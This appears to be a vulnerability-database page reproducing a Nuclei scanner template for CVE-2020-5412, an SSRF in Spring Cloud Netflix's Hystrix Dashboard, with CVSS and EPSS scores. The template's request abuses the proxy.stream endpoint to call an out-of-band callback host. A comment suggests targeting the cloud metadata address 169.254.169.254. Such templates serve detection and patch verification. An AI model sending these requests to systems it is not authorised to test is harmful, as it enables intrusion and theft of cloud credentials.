Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-5412
HistorySep 01, 2020 - 1:24 p.m.

Spring Cloud Netflix - Server-Side Request Forgery

2020-09-0113:24:39
ProjectDiscovery
github.com
8

4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

0.055 Low

EPSS

Percentile

93.3%

Spring Cloud Netflix 2.2.x prior to 2.2.4, 2.1.x prior to 2.1.6, and older unsupported versions are susceptible to server-side request forgery. Applications can use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. An attacker can send a request to other servers and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.

id: CVE-2020-5412

info:
  name: Spring Cloud Netflix - Server-Side Request Forgery
  author: dwisiswant0
  severity: medium
  description: Spring Cloud Netflix 2.2.x prior to 2.2.4, 2.1.x prior to 2.1.6, and older unsupported versions are susceptible to server-side request forgery. Applications can use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. An attacker can send a request to other servers and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    The vulnerability can result in unauthorized access to sensitive data or systems, leading to potential data breaches or further exploitation.
  remediation: |
    Apply the latest security patches or updates provided by Spring Cloud Netflix to mitigate the vulnerability.
  reference:
    - https://tanzu.vmware.com/security/cve-2020-5412
    - https://nvd.nist.gov/vuln/detail/CVE-2020-5412
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
    - https://github.com/pen4uin/awesome-vulnerability-research
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2020-5412
    cwe-id: CWE-610,CWE-441
    epss-score: 0.05469
    epss-percentile: 0.93009
    cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: vmware
    product: spring_cloud_netflix
  tags: cve,cve2020,ssrf,springcloud,vmware

http:
  - method: GET
    path:
      - "{{BaseURL}}/proxy.stream?origin=http://{{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: header
        words:
          - "Jelly"

      - type: status
        status:
          - 200

# To get crithit, try http://169.254.169.254/latest/metadata/
# digest: 4b0a00483046022100a6d1808432aa21357bfeceffa715768a7fcae54a5d6534e9d8a555629d1604f3022100e9de25f0b1d120f4b001820ec6d8ed841562d6cf449d223eb8fc6afa81e8bcbe:922c64590222798bb761d5b6d8e72950

4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

0.055 Low

EPSS

Percentile

93.3%

Related for NUCLEI:CVE-2020-5412